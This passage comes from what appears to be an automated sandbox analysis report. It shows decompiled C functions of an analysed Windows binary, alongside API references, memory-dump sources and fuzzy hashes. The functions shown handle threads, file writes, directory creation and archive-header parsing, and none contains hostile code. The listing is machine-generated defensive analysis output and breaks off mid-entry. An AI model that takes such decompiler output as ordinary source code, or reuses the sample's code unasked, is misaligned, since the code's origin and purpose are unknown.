                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 74940b09e8dd5e4bf7f59799555e2955a846cebcd1e9382484752ca1d3b2b60d
                • Instruction ID: 3159c684d4a94cf6d90dbdeeca929530bf990f8a016a0b624ca05edc8158a971
                • Opcode Fuzzy Hash: 74940b09e8dd5e4bf7f59799555e2955a846cebcd1e9382484752ca1d3b2b60d
                • Instruction Fuzzy Hash: F701F736242222ABC7218A69DC48F5AB798EF457A1711422AF916D3240DB30EE00DAE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB04F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00CB04F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xce00e0 > 0) {
					_t18 = 0xce00e4;
					do {
						_t7 = CreateThread(0, 0x10000, E00CB062F, 0xce00e0, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xce00e0);
							E00CA6CC9(E00CBE214(E00CA6CCE(0xce00e0)), 0xce00e0, 0xce00e0, 2);
						}
						 *_t18 = _t22;
						 *0x00CE01E4 =  *((intOrPtr*)(0xce01e4)) + 1;
						_t8 =  *0xce7368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xce00e0);
					return _t8;
				}
				return _t5;
			}













                0x00cb04fa
                0x00cb04fe
                0x00cb0502
                0x00cb0505
                0x00cb0519
                0x00cb051f
                0x00cb0523
                0x00cb0525
                0x00cb052a
                0x00cb0547
                0x00cb0547
                0x00cb054c
                0x00cb054e
                0x00cb0554
                0x00cb055b
                0x00cb0560
                0x00cb0560
                0x00cb0566
                0x00cb0567
                0x00cb056a
                0x00000000
                0x00cb056f
                0x00cb0573

                APIs
                • CreateThread.KERNELBASE ref: 00CB0519
                • SetThreadPriority.KERNEL32(?,00000000), ref: 00CB0560
                  • Part of subcall function 00CA6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6CEC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: 88cd683908402dd93e82216900f64a7e2f2b0f06a243f40dccd5e0f0c91e156d
                • Instruction ID: 9cfd6b99706a6f2d5476261460174c861028f14fac008c2bd1af85c547c3c59b
                • Opcode Fuzzy Hash: 88cd683908402dd93e82216900f64a7e2f2b0f06a243f40dccd5e0f0c91e156d
                • Instruction Fuzzy Hash: E50126B12443016BD720AF959C81BEB33A8EB40755F30002EF68262180CAE069859A74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9C34, Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00CA9C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E00CA6C55(0xce00e0, _t53 + 0x1e, 0) == 0) {
									E00CA6E9B(0xce00e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}













                0x00ca9c34
                0x00ca9c35
                0x00ca9c3a
                0x00ca9c3e
                0x00ca9c4b
                0x00ca9c55
                0x00ca9c55
                0x00ca9c5a
                0x00ca9c5a
                0x00ca9c5f
                0x00ca9c65
                0x00000000
                0x00000000
                0x00ca9c67
                0x00ca9c6b
                0x00ca9ccf
                0x00ca9cd3
                0x00ca9d2d
                0x00ca9d30
                0x00000000
                0x00ca9cdb
                0x00ca9cdd
                0x00ca9ced
                0x00ca9d28
                0x00000000
                0x00ca9d28
                0x00ca9cf3
                0x00ca9d04
                0x00ca9d0a
                0x00ca9d13
                0x00ca9d18
                0x00ca9d18
                0x00000000
                0x00ca9cf3
                0x00000000
                0x00000000
                0x00000000
                0x00ca9c6d
                0x00ca9c6d
                0x00ca9c6f
                0x00ca9c76
                0x00ca9c78
                0x00ca9c78
                0x00ca9c95
                0x00ca9c9a
                0x00ca9c9c
                0x00ca9c9f
                0x00000000
                0x00000000
                0x00ca9ca1
                0x00ca9ca9
                0x00000000
                0x00000000
                0x00ca9ccb
                0x00ca9ccd
                0x00000000
                0x00000000
                0x00000000
                0x00ca9ccd
                0x00000000
                0x00ca9cad
                0x00ca9cbc
                0x00ca9cc5
                0x00ca9cc9
                0x00000000
                0x00ca9cc9
                0x00ca9c5a
                0x00000000

                APIs
                • GetStdHandle.KERNEL32(000000F5,?,?,00CAC90A,00000001,?,?,?,00000000,00CB4AF4,?,?,?,?,?,00CB4599), ref: 00CA9C4F
                • WriteFile.KERNEL32(?,00000000,?,00CB47A1,00000000,?,?,00000000,00CB4AF4,?,?,?,?,?,00CB4599,?), ref: 00CA9C8F
                • WriteFile.KERNELBASE(?,00000000,?,00CB47A1,00000000,?,00000001,?,?,00CAC90A,00000001,?,?,?,00000000,00CB4AF4), ref: 00CA9CBC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: de673e04b01ee897de2a01df04c12f101d0ae3a192600fc8221665aa4b117506
                • Instruction ID: 2f9964beeff6391d7fa24c6024dadcba41f07b4eb86ef87334578f176a6f6bc4
                • Opcode Fuzzy Hash: de673e04b01ee897de2a01df04c12f101d0ae3a192600fc8221665aa4b117506
                • Instruction Fuzzy Hash: 89315B7154470BAFDB208F15C80ABAAFBE8FF5272CF008519F16557590C774A989CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9EF2, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CA9EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00CBD940();
				_t21 = _a4;
				_t8 =  *(E00CAB927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00CA9E6B(_t21) != 0 || E00CAB32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00CAA12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









                0x00ca9efa
                0x00ca9f00
                0x00ca9f09
                0x00ca9f0f
                0x00ca9f23
                0x00ca9f2b
                0x00ca9f69
                0x00ca9f6f
                0x00ca9f72
                0x00ca9f7e
                0x00ca9f80
                0x00ca9f74
                0x00ca9f74
                0x00ca9f77
                0x00000000
                0x00ca9f79
                0x00ca9f7b
                0x00ca9f7b
                0x00ca9f77
                0x00000000
                0x00000000
                0x00000000
                0x00ca9f16
                0x00ca9f19
                0x00ca9f21
                0x00ca9f56
                0x00ca9f5a
                0x00ca9f60
                0x00ca9f60
                0x00ca9f65
                0x00000000
                0x00000000
                0x00000000
                0x00ca9f21
                0x00ca9f85

                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CA9F19
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CA9F4C
                • GetLastError.KERNEL32(?,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CA9F69
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 2945c989f57bc49f41dc11eded6fcea5948b2dafa0bda2f7d4a5298946786250
                • Instruction ID: 0258b754b6a47da8f250342ffff80e942912822f57870167fc2ef97a75417100
                • Opcode Fuzzy Hash: 2945c989f57bc49f41dc11eded6fcea5948b2dafa0bda2f7d4a5298946786250
                • Instruction Fuzzy Hash: 0F01D23150525669DB219AE54C0BBFE335CDF07748F044412FA11D2052DB74DA81D6A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA399D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00CA399D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E00CBD870(E00CD11BE, _t153);
				E00CBD940();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00CA134C(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E00CAC5C9(_t83, _t120);
						_push(_t120);
						E00CB14DE(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00CB2842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E00CAA728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E00CAC67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E00CB24D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E00CA910B(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E00CAA6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00CA6BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E00CA6E03(0xce00e0, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00CAFBBB(_t148);
									}
								}
								L25:
								E00CB16CB(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E00CAC634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00CA1EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E00CAC699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00CA134C(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00CA134C(_t156, 0x1d, _t151 + 0x1e);
					E00CA6E03(0xce00e0, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

















                0x00ca399d
                0x00ca399d
                0x00ca39a2
                0x00ca39ac
                0x00ca39b2
                0x00ca39b4
                0x00ca39bb
                0x00ca39d9
                0x00ca39e0
                0x00ca3c22
                0x00ca3c28
                0x00000000
                0x00ca3c28
                0x00ca39e8
                0x00ca39f9
                0x00ca39ff
                0x00000000
                0x00000000
                0x00ca3a0b
                0x00ca3a0b
                0x00ca3a11
                0x00ca3a22
                0x00ca3a23
                0x00ca3a2c
                0x00ca3a31
                0x00ca3a38
                0x00ca3a3d
                0x00ca3a4c
                0x00ca3a4f
                0x00ca3a54
                0x00ca3a57
                0x00ca3a5a
                0x00ca3aaf
                0x00ca3aaf
                0x00ca3ab5
                0x00ca3b11
                0x00ca3b1f
                0x00ca3b33
                0x00ca3b40
                0x00ca3b46
                0x00ca3b4c
                0x00ca3b54
                0x00ca3b5a
                0x00ca3b66
                0x00ca3b72
                0x00ca3b75
                0x00ca3b78
                0x00ca3b7e
                0x00ca3b84
                0x00ca3b8a
                0x00ca3b90
                0x00ca3b96
                0x00ca3b9c
                0x00ca3bb5
                0x00ca3b9e
                0x00ca3b9e
                0x00ca3b9f
                0x00ca3ba0
                0x00ca3ba1
                0x00ca3ba1
                0x00ca3bcf
                0x00ca3bd1
                0x00ca3be0
                0x00ca3be2
                0x00ca3c0f
                0x00ca3be4
                0x00ca3bf1
                0x00ca3bfd
                0x00ca3c02
                0x00ca3c04
                0x00ca3c08
                0x00ca3c08
                0x00ca3c04
                0x00ca3c11
                0x00ca3c17
                0x00ca3c1d
                0x00000000
                0x00ca3c1f
                0x00ca3ab7
                0x00ca3abd
                0x00ca3ac3
                0x00000000
                0x00000000
                0x00ca3aec
                0x00ca3af5
                0x00ca3af5
                0x00ca3b0c
                0x00000000
                0x00ca3b0c
                0x00ca3a5c
                0x00ca3a62
                0x00ca3a82
                0x00ca3a82
                0x00ca3a84
                0x00ca3a97
                0x00ca3aaa
                0x00ca3a86
                0x00ca3a86
                0x00ca3a86
                0x00000000
                0x00ca3a84
                0x00ca3a64
                0x00ca3a72
                0x00ca3a78
                0x00000000
                0x00ca3a78
                0x00ca3a66
                0x00ca3a70
                0x00000000
                0x00000000
                0x00000000
                0x00ca3a70
                0x00ca3a13
                0x00ca3a19
                0x00000000
                0x00ca3a1b
                0x00ca3a1b
                0x00000000
                0x00ca3a1b
                0x00ca39bd
                0x00ca39c3
                0x00ca39cf
                0x00ca3c2d
                0x00ca3c2d
                0x00ca3c2f
                0x00ca3c33
                0x00ca3c3d
                0x00ca3c3d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID: CMT
                • API String ID: 3519838083-2756464174
                • Opcode ID: b7df51d3c13e415532324613b20d21659510c2c019ebb70d865b15e460b0a40d
                • Instruction ID: f484f3c82bcf576786c21a0fc19658228a8005a9ea79bdc4aff2a4c829143520
                • Opcode Fuzzy Hash: b7df51d3c13e415532324613b20d21659510c2c019ebb70d865b15e460b0a40d
                • Instruction Fuzzy Hash: 0871B171500B86AEDB21DF70CC51AEBB7E8AB16309F44496EF5AB87142D6316B44EF10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCA51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CCA51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0xcdd668; // 0x814d2927
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0xccab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0xccab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E00CCB5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E00CC97C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E00CC97C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				return E00CBE203(_t68, _v8 ^ _t100);
			}





























                0x00cca51e
                0x00cca529
                0x00cca530
                0x00cca535
                0x00cca540
                0x00cca552
                0x00cca64a
                0x00cca64a
                0x00cca650
                0x00cca652
                0x00cca653
                0x00cca653
                0x00cca655
                0x00cca65b
                0x00cca65b
                0x00cca65d
                0x00cca65f
                0x00cca668
                0x00cca66b
                0x00cca677
                0x00cca67e
                0x00cca68e
                0x00cca680
                0x00cca680
                0x00cca683
                0x00cca683
                0x00cca683
                0x00cca687
                0x00cca687
                0x00000000
                0x00cca687
                0x00cca66d
                0x00cca66d
                0x00cca672
                0x00cca672
                0x00cca68a
                0x00cca68a
                0x00cca68a
                0x00cca690
                0x00cca696
                0x00cca696
                0x00cca69c
                0x00cca69d
                0x00cca69d
                0x00cca558
                0x00cca558
                0x00cca55a
                0x00cca55a
                0x00cca561
                0x00cca562
                0x00cca566
                0x00cca56c
                0x00cca572
                0x00cca59a
                0x00cca59a
                0x00cca59c
                0x00000000
                0x00000000
                0x00cca57b
                0x00cca57f
                0x00cca591
                0x00cca591
                0x00cca593
                0x00000000
                0x00000000
                0x00cca584
                0x00cca586
                0x00cca588
                0x00cca590
                0x00cca590
                0x00000000
                0x00cca590
                0x00000000
                0x00cca586
                0x00cca595
                0x00cca595
                0x00cca598
                0x00cca598
                0x00cca59f
                0x00cca5b4
                0x00cca5ba
                0x00cca5ce
                0x00cca5d5
                0x00cca5e4
                0x00cca5f6
                0x00cca5fd
                0x00cca605
                0x00cca607
                0x00cca607
                0x00cca611
                0x00cca621
                0x00cca623
                0x00cca63a
                0x00cca625
                0x00cca625
                0x00cca625
                0x00cca625
                0x00cca62a
                0x00000000
                0x00cca62a
                0x00cca613
                0x00cca613
                0x00cca618
                0x00cca631
                0x00cca631
                0x00cca631
                0x00cca641
                0x00cca642
                0x00cca646
                0x00cca6b1

                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CCA543
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 5e92627018229730641f46808cd45a1b5ef349e6191e66c075c45f2bab3bc06d
                • Instruction ID: bd916212fb871470fcdf5d4c484375bf10bf4216bd2a1a71feabdde8e919a4fb
                • Opcode Fuzzy Hash: 5e92627018229730641f46808cd45a1b5ef349e6191e66c075c45f2bab3bc06d
                • Instruction Fuzzy Hash: 9E412A7090428C9EDF228E64CC88FFABBB9DB55308F1804EDE59A87142D2359A46DF21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA1D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                Download Yara Rule
                C-Code - Quality: 89%
